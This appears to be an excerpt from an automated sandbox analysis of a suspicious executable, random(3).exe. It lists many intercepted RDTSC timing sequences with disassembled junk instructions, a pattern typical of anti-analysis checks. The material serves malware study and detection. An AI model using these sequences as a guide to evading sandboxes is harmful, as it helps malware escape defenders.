    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1560AE3 second address: 1560AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F29FC4F369Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 156235E second address: 1562362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1562362 second address: 1562366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1562366 second address: 156236C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 156758A second address: 156758F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 156758F second address: 15675B5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F29FC518E98h 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007F29FC518EA9h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1567990 second address: 1567999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1567999 second address: 15679A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F29FC518E96h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 156A895 second address: 156A899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 156AB03 second address: 156AB25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F29FC518EA2h 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F29FC518E96h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 156AB25 second address: 156AB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1573153 second address: 157315F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F29FC518E96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15711BD second address: 15711C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1572583 second address: 1572589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1572589 second address: 15725A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F29FC4F36A4h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1572E62 second address: 1572E69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 157A991 second address: 157A995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 157A995 second address: 157A99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 157A99D second address: 157A9AF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F29FC4F369Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 157A9AF second address: 157A9B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1583727 second address: 158372B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1581B8A second address: 1581B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1581F53 second address: 1581F59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1581F59 second address: 1581F6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 158280A second address: 158280E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 158280E second address: 1582812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15835D9 second address: 15835E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15835E1 second address: 1583603 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC518EA5h 0x00000008 ja 00007F29FC518E96h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 158159F second address: 15815C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F29FC4F36A5h 0x0000000b popad 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F29FC4F3696h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15815C6 second address: 15815CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15815CA second address: 15815D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15815D2 second address: 15815DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F29FC518E96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15899B9 second address: 15899C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15899C0 second address: 15899C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15899C6 second address: 15899CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15899CC second address: 15899D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1589B28 second address: 1589B7F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007F29FC4F3696h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F29FC4F369Ch 0x00000011 jg 00007F29FC4F36B5h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F29FC4F36A3h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1589B7F second address: 1589B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1589B83 second address: 1589B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1589B87 second address: 1589B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1589CE1 second address: 1589CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1589CE7 second address: 1589CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1589CF2 second address: 1589CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F29FC4F3696h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 158C2B4 second address: 158C2C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007F29FC518E96h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 158C2C5 second address: 158C2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1599D83 second address: 1599D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1599D87 second address: 1599D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1599D8D second address: 1599D99 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29FC518E9Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 159C33D second address: 159C343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 159C343 second address: 159C347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 159BEB7 second address: 159BEBF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 159C069 second address: 159C07B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007F29FC518E96h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15A172A second address: 15A1731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15A1731 second address: 15A1743 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29FC518E98h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15A1743 second address: 15A1748 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15A1748 second address: 15A174E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15A174E second address: 15A1758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14BF238 second address: 14BF241 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14BF241 second address: 14BF246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14BF246 second address: 14BF28E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F29FC518E9Ch 0x00000008 je 00007F29FC518E96h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F29FC518EBEh 0x00000019 jmp 00007F29FC518EA9h 0x0000001e jmp 00007F29FC518E9Fh 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14BF28E second address: 14BF295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15A45D9 second address: 15A4644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F29FC518E96h 0x00000009 je 00007F29FC518E96h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F29FC518EA5h 0x00000018 jmp 00007F29FC518EA7h 0x0000001d jmp 00007F29FC518EA1h 0x00000022 popad 0x00000023 pop edx 0x00000024 pop eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push ebx 0x00000029 pop ebx 0x0000002a jmp 00007F29FC518EA3h 0x0000002f rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15A4644 second address: 15A4663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15A448B second address: 15A448F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15AA7B0 second address: 15AA7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F29FC4F369Eh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15AA7C8 second address: 15AA7CE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15AA7CE second address: 15AA7EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F29FC4F369Ah 0x0000000c jnp 00007F29FC4F3698h 0x00000012 pushad 0x00000013 jl 00007F29FC4F3696h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15AA638 second address: 15AA642 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29FC518E96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15AA642 second address: 15AA64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15AA64E second address: 15AA652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15ACAA5 second address: 15ACAA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15ACAA9 second address: 15ACAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15ACAAF second address: 15ACABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F29FC4F3696h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B263F second address: 15B2644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B2A54 second address: 15B2A58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B2A58 second address: 15B2A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518EA7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B2A75 second address: 15B2A80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F29FC4F3696h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B2BDB second address: 15B2BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B2BE0 second address: 15B2BF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC4F36A0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B2EC3 second address: 15B2EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B2EC9 second address: 15B2ED7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F29FC4F3696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B616E second address: 15B6174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B6174 second address: 15B6178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B6178 second address: 15B617C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B617C second address: 15B619E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F29FC4F36A0h 0x00000011 jmp 00007F29FC4F369Ah 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B619E second address: 15B61A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B8715 second address: 15B8724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jbe 00007F29FC4F369Ah 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15BB362 second address: 15BB368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15BB368 second address: 15BB373 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15FC376 second address: 15FC3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518EA6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jnc 00007F29FC518E96h 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007F29FC518EA8h 0x00000018 pop ebx 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F29FC518E9Bh 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15FC3C5 second address: 15FC3C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15FC3C9 second address: 15FC3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15F9399 second address: 15F939F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15F939F second address: 15F93DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518EA6h 0x00000009 popad 0x0000000a jmp 00007F29FC518EA9h 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F29FC518E96h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15F93DD second address: 15F93E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 160B4AB second address: 160B4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 160B4B0 second address: 160B4BA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F29FC4F369Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 160D591 second address: 160D597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 160D2D3 second address: 160D2E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAA4F second address: 16DAA65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAA65 second address: 16DAA6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAA6D second address: 16DAA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAA71 second address: 16DAA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 16DAA7E second address: 16DAA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
